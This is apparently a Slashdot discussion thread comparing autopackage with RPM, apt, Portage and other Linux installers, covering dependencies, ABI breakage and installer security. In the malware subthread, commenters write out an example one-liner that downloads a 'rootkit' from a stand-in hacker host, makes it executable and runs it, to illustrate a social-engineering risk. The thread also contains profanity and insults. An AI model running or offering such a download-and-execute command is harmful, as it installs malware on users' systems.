You just described autopackage! Everything you request is in there. Autopackage is just the next version of tarballs. Only easier to use and more compatible.

Re:How about autopackage at the source level?

[Storlek]

Everything you request is in there.

No, it's not.

Autopackage still uses a compiled binary, causing problems for programs using C++ (thanks to GCC's ABI changes from 3.2 to 3.4 -- this is even in big red letters on the site) and it's necessarily dependent on the processor architecture and executable format of the system. Unless autopackage magically decompiles the program and rebuilds it for the system it's running on, it doesn't offer any of that.

Autopackage is just the next version of tarballs. Only easier to use and more compatible.

What I described is a program that you essentially double click, press "build," and it installs itself. How could anything be easier than that? Also, how on earth could a prebuilt binary possibly be more compatible than source code? Besides, you know, introducing a dependence on the system's architecture and maybe using a conflicting ABI.

Autopackage is conceptually interesting, but it's not the answer.

AutoPackage is friggen sweet

[Ambient_Developer]

Have any of you actually used this? I used it myself to install inkscape (another very sweet app) and I am telling you guys, the people over at autopackage are giving you cake!! You don't even need the auto-package app on your computer, it is built into the binary. Autopackage then automatic goes out and updates it's self.. and then installs inkscape. Not only that it gives you a sweet package manager GUI. Trust me, this is definatly the way to go. Plus it is not distro dependant! It doesn't get any better!

Re:AutoPackage is friggen sweet

[51mon]

No, but for my distro of choice it is harder to install it using autopackage than using the distros own tools for same.

Ponder for a moment the detail captured in the deb for Inkscape....

Version: 0.41-1
Depends: libatk1.0-0 (>= 1.7.2), libc6 (>= 2.3.2.ds1-4), libfontconfig1 (>= 2.2.1), libfreetype6 (>= 2.1.5-1), libgc1, libgcc1 (>= 1:3.4.1-3), libglib2.0-0 (>= 2.6.0), libglibmm-2.4-1, libgtk2.0-0 (>= 2.6.0), libgtkmm-2.4-1, libpango1.0-0 (>= 1.8.0), libpng12-0 (>= 1.2.8rel), libpopt0 (>= 1.7), libsigc++-2.0-0 (>= 2.0.2), libstdc++5 (>= 1:3.3.4-1), libx11-6 | xlibs (>> 4.1.0), libxft2 (>> 2.1.1), libxml2 (>= 2.6.16), libxrender1, libxslt1.1 (>= 1.1.12), zlib1g (>= 1:1.2.1)
Suggests: dia, libwmf-bin, pstoedit, sketch, imagemagick, perlmagick

If the tool captures all that information, it could just as easily export a ".deb" file as an autopackage, if it doesn't understand that level of packaging detail the question is "what are we losing?".

My guess if your using gentoo is you ain't losing much, but there is a reason Debian works better than other distros (sufficiently controversial?).

Basically they are saying we might get away with packaging end user applications this way if we can assume some sort of broad base of a system already installed.

I assume it has some sort of security update mechanism to tell it to upgrade then the application has a security issue, so I've just doubled the complexity of my patching by installing one app - yeap beginning to sound like the ease of use of installing and maintaining Windows software.

If people go this way, I suspect Debian will ignore them, and as a result remain the distribution other people build distributions off.

I fail to see how apt (or yum) doesn't scale beyond how maintaining software with dependencies doesn't scale. Now I'd agree maintaining ever bigger suites of software through dependencies creates issues with maintaining that dependency information (although I'd have thought it small compared to maintaining the code itself), although it is presumably possible to use metapackages to define "baselines" to reduce that complexity (or sweep it under someone elses carpet).

My Preference is Appfolders

[NoMercy]

I was first exposed to them a long time ago, and yes there is no easy way to include dependency checking, though I can't see why it would be any more dificult to include a dependency resolver for when the required support libraries arn't available.

My main guess as to why they havn't chosen this technique is because app folders are not a feature of linux, theres no kernel support for them and theres virtually no support for them in graphical filers (ROX Desktop is the only one which comes to mind).

I'm sure at some point Windows or MacOS will come up with a lovely system for installing applications and then we'll copy them :)

Not as simple as that

[Orion+Blastar]

get a few corrupted libraries and apt-get is useless. You then have to use the deb tool to remove the corrupt libraries and run apt-get again and hope it works. If not, you may have to reformat and try again.

I've had Debian distros do a meltdown on me doing that, and I followed every helpful guide on the Internet trying to fix it. The Autopackage technology seems like it has a fix for these dependancy problems and corrupt libraries.

Much as I hate to say it, Autopackage seems to add in Microsoft Windows like install and removal abilities to Linux. This is a good thing, because it makes Linux more of a desktop OS that the average person can use without learning how to be a Linux Admin. That makes Linux more popular and maybe more people will switch to it.

Re:nextgen already here: emerge

[theLOUDroom]

I never said I was part of that 97% jackass...

Nor did I. Perhaps you are unfamiliar with the word "if"?

There's no reason to resort to this ad hominem crap because you're ticked about something I didn't even say.

Who will this benefit the most?

[Lb73uaZj]

Autopackage may be useful in providing a relatively hassle free method of installing applications.
I've been using Linux for quite a while (since 1997) and I think there is room for improvement, I like what I have going and don't need to change.

In addition to my current debian based systems, I've used RPM based distros (come to think of it my file server is limping around on a busted Fedora Core 2 install -- and it still does everything I need it too). One day I'll play around with Gentoo, just to see what all the fuss is about.

In other words I don't think this system will be a great benefit to an experienced Linux user.

Linux noobs would benefit more from finding a distro, learn it break it fix it. Than some newfangled universal wonder, that could cause confusion as to where the problem may be. (is it the distro? is it the package? is it me, or something I've done... fear panic... Oh well, I'll just go back to windows.

Some developers will benefit. But I'd guess that most GPL'd and open source devlopers have already got their groove on.

HMM... PROPRIETARY... maybe. I'm sure all of hardware manufactures with their trade secrets would love to have a package system that keeps their stuff locked up in a tidy cell.

This could be good: the more stuff that comes to Linux, the more stuff we can play with.

This could be bad: this free software stuff came into existance because Richard Stallman (as the story goes) wanted to make a simple tweek to a printer; this could help to bring that wonderful creation back to where it all started.

I'm not into Linux for the free stuff I'm into it because I love feedom.

Re:nextgen already here: emerge

[voisine]

Yes, what's needed for binary packages to work is a well defined base system like commercial OSs like Windows and OS X have. This base system gets upgraded no more often than every six months except for minor patches. That way you can release a binary package that works with standard linux base version 3 or standard linux base version 4, etc... Without that the best option is soruce compiling, otherwise even with something like autopackage, you're still stuck in at least the 3rd circle of dependency hell instead of the 9th.

But... what about the hard parts!

RMS must by really pissed off by this. "You mean we aren't going to make the user run a batch of typed commands in order to install a program?! Why are you trying to make it easy for people!? Using Linux is supposed to be hard and tedious!"

Ok, maybe I need to calm down my GNU-angst a little...

I LOVE this idea

[hirschma]

Currently, too many third party softwares come as RPMs. Want to use Sybase? You need to be (somewhat) RPM compatible. Bleh.

I hope that this catches, and that the major distros help with the integration into the native package schemes. This'd be a great thing for folks that actually BUY software for Linux.

jh

Those silly hobbits...

From the FAQ we can learn:

"Can I autopackage KDE/Qt apps?

It is possible but hard, because the C++ ABI is not stable. It was supposd to be, but then gcc 3.4 broke it yet again. Until we have a stable C++ ABI on Linux distributing binaries that link against anything other than the standard library is a bad idea. GTKmm apps are OK because you can statically link GTKmm and not suffer too badly, but Qt/KDE cannot be statically linked in a sensible fashion. Better support for KDE C++ apps is planned"

is this for adults?

Linux Standard Base

[tepples]

Long term what I'd like to see is an equivalent to freedesktop.org for distributions, where distro developers can congregate and produce standards on how things should work.

Repeat after me: All your Linux Standard Base are belong to us.

... is completely unclear

[Nailer]

The FAQ answers that question with:

What RPM is not good at is non-core packages, ie programs available from the net, from commercial vendors, magazine coverdisks and so on.

Why not? If you're going to spend a metric shitload of time creating a new packaging format and you want anyone to use it, some actual justification might help.

Personally, I'd add non DB backends, suggests/recommends, and non root installs to RPM, or add better file / signature verification, a DB backend, and non root installs to dpkg.

Re:... is completely unclear

[Nailer]

Actually, I'll bite on some of his later answers, where, unlike the one to the previous question. he does go through some specific issues he has 'with RPM/Dpkg':

"Other dependencies are not so simple, there is no file that reliably expresses the dependency, or the file could be in multiple locations"

Yes, that's what virtual dependencies / capabilities in both rpm and dpkg provide. As for files moving around, that's what the FHS is for. Got a

But in reality, you don't encounter this scenerio untill you install rpms/ debs on another distro. Big deal: binary packages will always be built against specific library versions. Autopackage doesn't solve that.

"because RPM is, at the end of the day, a tool to help distro makers, they sometimes add new macros and features to it and then use them in their specfiles. People want proper integration of course, so they use Mandrake specific macros "

That's a human problem. You can't fix it with technology. Taking away the ability to have custom macros is a bad thing. Encouraging proper behavior is a better thing.

"Bad interactions with source code: because the current versions of RPM don't check the system directly, they only check a database"

You don't mean bad interaction with source code. Installing from source works fine, provided you know how to make install you can easily reate an RPM of most autoconf apps in about 2 minutes.

You mean bad interaction with non-packaged software. Again, that's a human issue, but one that's been solved better and better over time. Both OSS projects and proprietary vendors including Adobe's, BEAs, Macromedia etc. all release properly packaged binaries.

And frankly, I like having a database. I want to be able to find out what package was responsible for installing a file, and a URL where I can get a new version of the software. I like having a checksum of all my files at install time, so I can see if they've changed later. All of which autopackage doesn't do.

I don't like anything that encourages people to install unsigned applications from the internet, which autopackage does.

"a dependency does not encode any information on where to find it"

Yes, Great they kept that shit out of the dependency isn't it? Because what provides that capability isn't determined by the software. My app needs a webserver. That could be thhtpd, Apache httpd, Roxen, or whatever else. Rather than specifying what package provides that dependency, they simply list the depency. Three of my available packages say they provide a webserver capability. When a new webserver comes out, it will say it provides that capability too. Without requiring a new package of the thing that wants a webserver. Brilliant stuff!

Re:... is completely unclear

[IamTheRealMike]

Hey now, no need to get offensive.

Yes, that's what virtual dependencies / capabilities in both rpm and dpkg provide. As for files moving around, that's what the FHS is for.

I'm afraid the FHS is a mostly useless document that is far, far too vague to deserve the title of "standard". Many distros ignore it, or interpret it differently. Virtual dependencies/capabilities and so on are fine solutions inside a particular distribution but there are no standards. This boils back down to dep metadata differences.

But in reality, you don't encounter this scenerio untill you install rpms/ debs on another distro. Big deal: binary packages will always be built against specific library versions. Autopackage doesn't solve that.

Are you sure it doesn't solve that? Because it seems to me that it would not work if it didn't, yet it does work. Here are some keywords for you: "relaytool", "binary stability", "dependency audit". I think you should open your mind a little and explore the project more before writing it off.

That's a human problem. You can't fix it with technology. Taking away the ability to have custom macros is a bad thing. Encouraging proper behavior is a better thing.

I never said custom macros were bad, merely pointing out that they cause inter-distro package incompatibilities. You're quoting from the section "Why are RPMs I find on the net not portable between distributions". It's not a slam against RPM, just a statement of the facts. I wouldn't take it personally.

Both OSS projects and proprietary vendors including Adobe's, BEAs, Macromedia etc. all release properly packaged binaries.

Most proprietary vendors release RPMs with virtually no dependency data at all, certainly not packages suitable for use with apt or similar depsolvers. They are basically being used as magic tarballs.

And frankly, I like having a database.

Sure, we all do. Autopackage has a database and can list files/file ownership too. It also checksums files. Again, you seem to be writing it off without knowing anything about (gee, exactly what you're accusing me of!). It's not integrated with the native database yet because there are a whole class of users who care more about getting the software onto their system than what form it comes in, but I'm sure somebody will step up and write the support eventually: there are already architectural hooks for it. Who knows, maybe I'll do it.

Really, you should just chill out a bit. Even if you hate it, remember that many people don't give a monkeys about checksumming files in a database: they just want it to work and saying "I won't install this because it's in the wrong form" is no solution.

I for one ...

[ggvaidya]

No, seriously. I was just thinking this morning about how I'd love to set up Fedora on a lab computer (so that other people can oogle at the Beauty, and not be confused by the much cooler Debian) if only apt-get was available ... but this is so much cooler! Thank you, Autopackage!

Re:I for one ...

[juhaz]

You know, apt-get has been available for Fedora (and RH before that) for several years.

So, how about going back under that bridge like a good little troll?

Finally

[sn0wflake]

Finally something that resembles the ease of use of Windows.

Re:Finally

[be-fan]

Yeah, it resembles it alright. Since Windows installers are a step down from just "point, click, and install" in Synaptic, that's not a good thing...

distribution packages are better

[idlake]

The system of attempting to package everything the user of the distro might ever want is not scalable.

Looks like it is to me: Debian has pretty much everything I want. If it's not been packaged yet, it's probably not in good enough shape yet to use either.

Distro developers end up duplicating effort on a massive scale. 20 distros == the same software packaged 20 times

The idea that this is duplicated effort presumes that the main work and value of creating packages for distributions is in putting things into containers, but that's wrong. The main work and value of distributions like Debian is in the extensive testing that goes into making sure that all the packages work together.

Debian does two more things: during the process of Debian packaging, people review the licenses associated with software. When I install software in core Debian, I can be sure that it doesn't come with weird or restrictive licenses attached. And Debian also provides a central point of contact for issues like security and Trojans.

Packages created with Autopackage don't provide any of that--anybody can throw any kind of shit into an autopackage and put it on their web site. There is no guarantee that stuff has been tested, there is no independent review, there is no point of contact to resolve conflicts.

Packaging for distributions has a huge value and Autopackage isn't providing it. Systems like Autopackage take us back to the chaotic software maintenance practices on Windows and OS X, and I don't want to be there.

Well, not always

[melted]

Most large apps require installation. Final Cut express does. Photoshop does. PhaseOne CaptureOne does. The list can go on and on. And they really poop their libraries all over your hard drive. Worse yet, on Mac OS X there's no uninstaller. You just drag the corresponding dirs to the trash can. Trouble is, they're in half a dozen different places.

I like the idea of bundles, though, and I like the apps that I can cleanly uninstall by dragging them into the trash can. But, unfortunately, not all apps on the Mac conform to this ideal.

From the FAQ

[Heretik]

In order to install a .package file, you run it [...]

Executable packages? Gee, that hasn't shown to be a brutally horrible idea by a certain other OS, has it?

No thank you.

Anmd using 2 package systems makes it easier?

[Nailer]

"The reason is that most of these packaging solutions, while great for developers and those who want detailed knowledge of the inner workings of their systems, simply suck when given to mortal users."

Put a user in front of a half autopackage half RPM/dpkg solution (remember kids, the autopackage author thinks you should maintain two packaging systems and an arbitrary distinction between stuff included in your distro and stuff that's not, yet).

Take that same user, and put them in front of Synaptic, or (tho I haven't tried it) that cute little Ubuntu updater thing.

Then make up your mind.

Not everyone uses Debian

[petrus4]

>The main work and value of distributions like >Debian is in the extensive testing that goes into >making sure that all the packages work together.

One thing...not everyone uses the same distribution. And before you say it, no, we shouldn't. The lack of a monoculture is one of Linux's primary defenses against viruses...To newbs, lack of a single universal interface seems like a weakness...but apart from strong multi-user, one of the other things that impedes virus writing is the lack of a consistent environment...because it means a virus writer cannot make a single set of assumptions about how a virus will need to behave. If a virus was written to attack something written for KDE, for example, the fact that there are other desktops means that a Gnome user may not be affected by it. People keep calling for "unity" all the time, when what they don't realise is that the universal interface is actually one of Microsoft's biggest problems...it's not a strength.

Autopackage is something that would be distro independent, and as such could be extremely beneficial...people could still ship distro-specific patches with an autopackage quite easily if they wanted to. The added benefit though would also be that someone who either wasn't using Debian/RH or who was actually using something distro-neutral like LFS could still install it.

Linux has always been about choice. If someone wants to use Debian, great...but there are a lot of other distributions out there which do different things. Autopackage could give all of them the means of installing packages easily, while still retaining their uniqueness. That's a good and important thing.

Autopackage is the wrong solution

[Nailer]

"Dropping to a terminal, cd pathtoapp, tar -jxvf whatever.tar.gz, cd newpath, ./configure; make; make install is too much shit for a user -- and then how to uninstall? Keep the source directory there forever? "

Agreed. But how is using 2 package sytems (as the autopackge author recommends) with a weird distinction between what's installed in your current distro and 'third paty' apps easier than:

1). Putting a link to 'Synaptic software installer'
2). Having them browse for their app or simply type its name.
3). Letting them click OK as the app and its dependencies are downloaded and installed for them

?

A console-like model would take Free out of FreeSW

[tepples]

The current Linux model of distros integrating and authenticating software from upstream authors

...if made exclusive would become analogous to the game console model. If you can't get signed by a major publisher that's large enough to talk to console makers, you can't get your game published at all. Is this how you want Free operating systems to work?

Dependancies

[cookiepus]

The flash demo shows a dependancy check. The screen shots show the dependancy screen with one "warning"-level issue (a dependancy that is recomended but not necessary)

But what happens if a dependancy is missing? Is the user stuck having to go find and install that thing first? Or does the thing try and fetch it?

The FAQs posted in the thread do not seem to answer that question. To me, it's the most important one. I don't have a problem typing 'rpm' on command line, I don't mind configure; make ; make install. Do do mind having to trace down every single dependancy that's either not on my system or on my system but needs a symlink to a different name before the install recognizes it.

So, does this AutoPackaging thingy have a way to deal with that?

Re:Dependancies

[IamTheRealMike]

It'll try and download ("resolve") the dependency, there is a screenshot of this happening in the gallery. It's the one with the big globe picture. Right now it can only do that if there is an autopackage of the dependency too. In future it'll get smarter.

Re:nextgen already here: emerge

[ArbitraryConstant]

Indeed.

Hell, you can have completely duplicate directory tree for these "Linux base" libraries if you want to hang on to what the distro already had. That would make sense as this stable base would probably never be as up to date as some of the distros.

Some things have their own libraries anyway, as it's the only sane way to support all the distros out there, but it would be a big win if applications could share these. And if they have nothing to do with the distro they're installed on, you could install these on Debian-stable or some old version of Slackware if you wanted. They'd just need kernel support for what they want to do.

Worked fine on SimplyMEPIS-3.3

[Jerry]

see subject

Arbitrary code inside rpms considered harmful

[j1m+5n0w]

And how is this different from: 'Hello random package from the repository (even if you are signed by the distro maintainers), here, overwrite any of my libraries you'd like, with whatever obscure or customised version (think distro-specific patches) you want. Oh, and while you're at it, do whatever you want to my /etc (from your postinstall script, running as root)...'

I think that's a good argument that rpm is broken, not that Windows is good. Personally, I think there should be two different types of rpm, with different file extensions: those that just install files that weren't there before (the common case for most libraries and applications) and those that require some special magic post install script. (Hopefully there wouldn't be many of the latter, and it should be glaringly obvious that they run arbitrary code - perhaps rpm should complain loudly, and/or require user confirmation)

Re:nextgen already here: emerge

[joeljkp]

He's referring to the last sentence, in which you question how 'you' (I guess talking about the poster) could install Gentoo without knowing the command line.

I can see how it could be taken both ways.

This is one that Linux really badly needs

[Albinoman]

Im sure its been said elsewhere, but I think this is one of the big hurdles that Linux faces. I use Windows almost exclusively. Ive tried a few Linux distros in the past, but there were two things that always sent me back.

First was the games. All the popular games, therefore more money and time dumped into them, are for Windows. I know what Transgaming is doing, Ive even had a subscription there before too. But its too slow. I think OpenGL is partially to blame for this. Theyve always been slower to adapt than Microsoft is with DirectX. DirectX has done a good job of becoming all encompassing too, with video, audio, network play, etc.

Second, is the pain that it is to install almost anything. Skipping over figuring out which version of the file you need (distro, version), now you have to download these packed files which you have to unpackage first, whose instructions are written for a command line. Whens the last time you had to bust out pkunzip to install a program in Windows? The youd have to use Notepad to edit a file. Youd be lucky to find 1 in 10 computer users that even know of a program that will compile C ("What the hell is 'C'?"). RPM is merely OK.

Re:This is one that Linux really badly needs

[pAnkRat]

For your second problem:

try debian or derivats (ubuntu, ..)
Software installation is easy with apt-get because it installs all dependencies automagicly.
If you dont want to use the commandline, use a graphical frontend.

Nuff' said.

I like Portage

[r_jensen11]

I like Portage

Sounds like Windows to me. n/t

Sounds like Windows to me. n/t

Clarify a point for me please

[Baloo+Ursidae]

What exactly is the "shitload" to "metric shitload" ratio anyway? I know I'm an ignorant American, but I'm at least trying to learn...

Re:Clarify a point for me please

[Nailer]

1:1.2

Hear, hear.

[Grendel+Drago]

I like having my apps packaged in a standardized format. Compare, if you will, gPhoto against the software that comes with your average $19.99 Wal-Mart digicam. gPhoto offers a standard interface for any camera, whereas the Mart software uses its own look and feel, its own interface, its own installation system, and if you get a different camera, you need another multi-megabyte install. Pfah!

I like having software that's written from the user's perspective and not the hardware manufacturer's. I like having a great big list of all the packages which exist in the "world" as my distribution sees it.

Installing software under Linux is, for me, as a rule, nicer than installing under Windows.

That said, it would be nice if they had some sort of baseline standard for library version or whatnot, something along the lines of "this app will run on Generic Standard Linux 1.1", which would be a set of, say, glibc this and libfoo that and so forth. Might be a useful way to get the same baseline that people coding to Windows 2000 have to work with.

--grendel drago

Use Stow for custom installed software

[life+Acolyte]

It amazes me that GNU Stow has not been mentioned yet (http://www.gnu.org/software/stow).

If the software you are installing uses the autotools, it's this easy to install software:

$ mkdir /usr/local/stow/swiprolog
$ ./configure --prefix=/usr/local/stow/swiprolog
$ make; make install prefix=/usr/local/stow/swiprolog

You can do all this as a non-root user (aside from creating the directory of course). So you will sure that swiprolog didn't write files in funny
locations.

Now you need to Stow it (`apt-get install stow` on Debian):

# As root
$ stow /usr/local/stow/swiprolog

This makes symlinks into the /usr/local hierarchy.

When time for deletion comes:

$ stow -D /usr/local/stow/swiprolog

Its clean and has worked for me for many years.

Easy Package Management

[marafa]

the makers of CUPS: the Common Unix Printing System has another product called EPM: Easy Package Management available at http://www.easysw.com/epm/.

EPM is a free UNIX software/file packaging program that generates distribution archives from a list of files.
EPM Can:

* Generate portable script-based distribution packages complete with installation and removal scripts and standard install/uninstall GUIs.
* Generate "native" distributions in AIX, BSD, Debian, HP-UX, IRIX, MacOS X, Red Hat, Slackware, Solaris, and Tru64 UNIX formats.
* Provide a complete, cross-platform software distribution solution for your applications.

____
to the guy marking my comments as -1: why?

Re:nextgen already here: emerge

Jesus Gentoo fanbois can be annoying.

Just like halfwits who spell fanboy as fanbois.

That was cool to when you were 13, and annoying as hell for pretty much everybody who is older. Grow the fuck up.

Re:nextgen already here: emerge

That simply confirms that Gentoy users are clueless 14 year old fanboys with no talent.

What we need is distinction

[harryman100]

Having read much of what people have to say about this, I think everyone appears to agree that the convoluted mess of packaging systems in linux is a major turn off for users. I know when I first started using linux (mandrake 9, and then RH9), that I was very confused about such things, I considered myself to be quite handy with a computer, but the large multitude of different types of packages, and the inconsistency with which types were available, was a complete nightmare.

What people (Joe Public) want, is to be able to find a piece of software on the internet, while they're searching for what they want. Download a file, run it, and then after that be able to use the software.

They don't want to piss around with dependancies, running scripts, configuring, building, or anything like that. They want to be presented with a few basic options, be able to click next a couple of times, and then its done.

Sysadmins/power users/dA 133735T H4X0RS don't need this, they can cope with ./configure && make && make install, they're generally the only people who need different/complicated set ups.

The Joe Public perception of how computers work, isn't in depth enough to go into dependancies/librarys/System folders/etc. This is where I think Complete seperation of the Operating System, and the programs running on it, would be advantageous. Dare I say it, but Windows appears to be better in this area, (I can't compare to OS X, I've never been rich enough to own something that runs it) C:\Program Files\ and C:\Windows\ make sense. Admittedly Microsoft is not very at sticking to this, insisting that programs and the OS need to be locked together, and things that I would consider Applications, end up in the Windows Directory.

It should not be a strict definition between what is physically part of the OS and what is a standalone program, it should be down to the user's perception, of what is an application and what is not.

I think this is where the seperation between different package types would be beneficial. The OS/Distribution could use whatever package style it wanted for the componants of the main operating system. It could also include packages of popular programs, which the user can then choose to install seperately. Or they can download alternative packages which they can install instead.

This appears to be what autopackage is aiming for, I think they're getting it right.

What people who want linux on the desktop need to start pushing for, is something universal for programs to be distributed in, so people can download, click, and go. Without first having to dig through a repository to see if their distribution has a probably out of date copy. Yes, that works for OS bits and pieces, and perhaps services like httpd,ssh,etc. Maybe even hardware drivers. But this should be seperate from any repository for userland programs. So that users can see the distinction.

My 2 cents.

Yikes!

[Polly_Morf]

Seriously! This should be used! I tried this, and it works great! Darn! Problem is to make the distros support it. I really hope they will!

dll hell is gone... because

dll hell is gone because everyone uses .net
there is no huge install base it simply doesnt exist and nobody uses programs written for win9x/winnt.. nothing to see here folks

ok lets just recall where dll hell comes from for a second. oh yeah thats right. in windows nt i mean dos, you only have 8.3 letters for a file name and so your dll's can only have 8.3 letters.. oh wait only 8 letters to identify them. now under unix you can have /lib/somelib.crazy.1.1.23-51.so and /lib/somelib.crazy.1.9.73-23.so .... wow.. all libraries that are different have different names and can never get confused or overwrite each other. simple solution. dosnt really does suck though. dosnt just isnt designed to be a real os. sorry. technical decisions are trounced by marketing, remember graphics drivers going to ring0.. after all that trouble that intel went to with designing hardware to do ioctrls and stuff. hardware to test a bitmap to check permisions on io ports.. windos is just not designed to be technically correct.

No it doesn't

[hawk]

. Instead, BSD ports will go download and compile everything, then request the root password later, wasting the user's time if she doesn't have the admin around.

No it doesn't. It can't, unless permissions have been changed.

Unless the user has specified otherwise, the download will go to /usr/ports/distfiles, to which the user has no write permission. If the source *does* exist, it will attempt to unpack it in /usr/ports/category/thisport/work, and fail for lack of write permission.

hawk

I'll educate me

[theantix]

On the half-baked chance you aren't just pulling my leg, I'll take your reply seriously. After all, _someone_ thought you were serious (or funny enough to warrant a moderation).

Do not imagine that if Linux had the popularity of Microsoft(tm) Windows(r), it would take the malware coders more than a week to get into business. All they need is to provide executable files to run, and end-users they can convince to download files and then double-click them (assuming that Linux web browsers continue to non-autoexecute downloaded binaries). Once they've run that one binary, it can either execute the malware immediately, or merely install it in the user's writable disk space (including ~/.login, as well as ~/.firefox and maybe elsewhere)

If a system administrator feels his users at risk of installing malware, she is well able to disallow execution of files in their homedirectories. This will prevent home-grown attacks (like "paste these 3 lines into a terminal: wget http://download.hacker.com/rootkit;./rootkit"), and also make autopackage impotent as a side-effect. (An admin with this attitude would also disallow users from running autopackage at all, of course)

You obviously have no experience with linux, or are trying to trick people. If one downloads a file from the internet and then "double-clicks" it on the desktop as you suggest, it does not run. It requires you to go into a terminal and chmod a+x to the file in question before it will execute an app like that. This is a step that all by itself will prevent most inexperienced users from installing this sort of malware crap. Ironically, most of them will thing "ROFL LOL Gee Lunix suxx its so hard to use lol!!!" while it is saving their ass from their own stupidity.

What I am concerned about with autopackage is *exactly* the scenario you suggest. If autopackage was bundled by distro makers, then unlike now people *could* install malware crap at the touch of a button from the internet. Linux would be "easier to use" and thus instantly becoming rapidly easy to make just as lousy as Windows is now. This is why I am fighting the adoption of AutoPackage, because in the long run it can only hurt the overall user experience.

Re:I'll educate me

Wow. What a shortsighted view. Your comment is almost a troll, as you suggest that Linux should be secure by being hard to operate. This is not that far from security through obscurity, which Microsoft tends to work under. Both of these techniques are ineffective, by the way.

By the way, the example could add a chmod if required.
wget http://download.hacker.com/rootkit;chmod a+x rootkit;./rootkit

Re:I'll educate me

[Minna+Kirai]

You obviously have no experience with linux, or are trying to trick people.

I've run nothing but Linux on my desktop PC for 7 years now.

It requires you to go into a terminal and chmod a+x to the file in question before it will execute an app like that.

Does the word "umask" mean anything to you? How about "Linspire"?

Ironically, most of them will thing "ROFL LOL Gee Lunix suxx its so hard to use lol!!!"

Right, they'll say that, and they won't buy Linux, and then a vendor who wants to sell them Linux will "solve their complaints" by setting it to be easy to do this, and the problem starts apace.

Your argument makes as much sense as suggesting that online copyright-infringement of music should be legalized because the MP3 format has too poor sound quality to compete with CDs.

I'll paste in the AC response, just because she was pretty insightful:

1. Wow. What a shortsighted view. Your comment is almost a troll, as you suggest that Linux should be secure by being hard to operate. This is not that far from security through obscurity, which Microsoft tends to work under. Both of these techniques are ineffective, by the way.
2. 
   
   By the way, the example could add a chmod if required.
   wget http://download.hacker.com/rootkit;chmod a+x rootkit;./rootkit

Re:I'll educate me

[theantix]

"You obviously have no experience with linux, or are trying to trick people."

I've run nothing but Linux on my desktop PC for 7 years now.

Note the part after I said "or"? The fact is, if you've used Linux for seven years on the desktop than you should know quite well that every major distribution doesn't drop freshly downloaded files to the desktop with the executable bit set on them. I'm not saying "you're an ignorant fool" or "you're a disingenous troll", I'm leaving the option open for both.

Your argument makes as much sense as suggesting that online copyright-infringement of music should be legalized because the MP3 format has too poor sound quality to compete with CDs.

Oh yeah, well your argument is like Hitler! Or some other such nonsense... I hope you see how foolish you sound.

Wow. What a shortsighted view. Your comment is almost a troll, as you suggest that Linux should be secure by being hard to operate. This is not that far from security through obscurity, which Microsoft tends to work under. Both of these techniques are ineffective, by the way.

You call it security by obscurity, I call it security by making dangerous things difficult to do. When a DOS user types "Format c:", does that just work all of a sudden? Well it used to, and dumbshit morons did it all too frequently so Microsoft learned to make this dangerous task a bit more complicated by forcing the user to type in the volume label exactly correct as confirmation. This added complication made it so that the people who didn't realize what a dangerous thing they were doing.

Likewise, the minor difficulty of making a linux user drop to a command line and perform operations there will prevent the vast majority of inexperienced users from peforming the dangerous of installing software off the internet, something that they have repeatedly proven to be unable to do safely. It's not that complicated, but I guess even simple things are too much for some slashbots....

Re:I'll educate me

[Minna+Kirai]

I'm not saying "you're an ignorant fool" or "you're a disingenous troll", I'm leaving the option open for both.

Intelligent people can refer up this thread to see who was really trolling here... (Hint: the selectively illiterate ignoramus)

GNUStep does it all ...

except perhaps associating the FS IDs with the folder (which IMHO is a bad idea anyway).

Let's Try

[Tellalian]

Taking their advice, as a test I tried installing the Gaim autopackage.

FAIL: You don't have enough disk space for in prefix , you need at least bytes /usr/libexec/autopackage/freespace: error while loading shared libraries: libgcc_s.so.1: cannot open shared object file: No such file or directory

Oh well.

At least we agree about that!

[theantix]

100% on that one!

Re:nextgen already here: emerge

[juhaz]

The nice thing about ebuilds, as opposed to binary packages it that so long as you have libraries installed that can work with foobar, you can install foobar.

There's no such difference, since we're talking about creating your own ebuilds, the logical comparison is not to ready built binary packages but to whipping your own as well.

RPM spec files aren't black magic, it's no big deal to create a totally new package, rather similar to creating ebuilds, I'd expect, and recompiling source rpm's is dead simple. I doubt debs are much harder.

I remember for example fighting with mplayer (wants GCC 2.95) and redhat (wants GCC 2.96), back in the days that I used redhat.
There is nothing autopackage would have done to solve that problem, because it's a binary packaging format.

There's nothing ebuild would have done to solve that problem, because it wasn't problem with ABI, mplayer just didn't like 2.96, recompiling it with it would not have helped.

Your knowledge about binary packages and especially where they come from and how easily they can be modified seems quite lacking.

Re:nextgen already here: emerge

[theLOUDroom]

Your knowledge about binary packages and especially Your knowledge about binary packages and especially where they come from and how easily they can be modified seems quite lacking.

What's wrong with you man?
You're getting all condescending with out understanding any of the points I made.

There's no such difference, since we're talking about creating your own ebuilds

We're not. We're talking about downloading an ebuild as opposed to downloading an RPM, autopackage or whatever.

There's nothing ebuild would have done to solve that problem, because it wasn't problem with ABI, mplayer just didn't like 2.96, recompiling it with it would not have helped.

Portage solves this problem by installing the correct libraries for each package automagically and by recompiling each package to use libaries that actually exist on the system.

If you give me a binary compiled for a library I don't have, it isn't going to work. Rebuiling the RPM from source IS THE SAME FUCKING THING THAT PORTAGE DOES, EXCEPT THAT PORTAGE DOES IT AUTOMATICALLY. If you're rebuilding the code from source, you're no longer distributing binaries.

To act is if I don't know "about binary packages and especially where they come from and how easily they can be modified" is being a total fucktard. If you're building from source, you're not using binary packages as your distribution mechanism. Why? Because you wouldn't have the source code to build the program from if you did.

Mods, I generally try to aviod calling someone a 'fucktard', but guys like this really deserve to get flamed to a crisp. If you're going to be condescending at least have a clue what you're talking about.

Re:nextgen already here: emerge

[frankm_slashdot]

how the fuck was that a troll? granted this is a flame... but thats not a fucking troll.

Yay!

[xpyr]

Well looks like linux is getting to be more and more easier to use. Having one install program that works across all distributions is great. Just like the windows world. And that's the way I like it.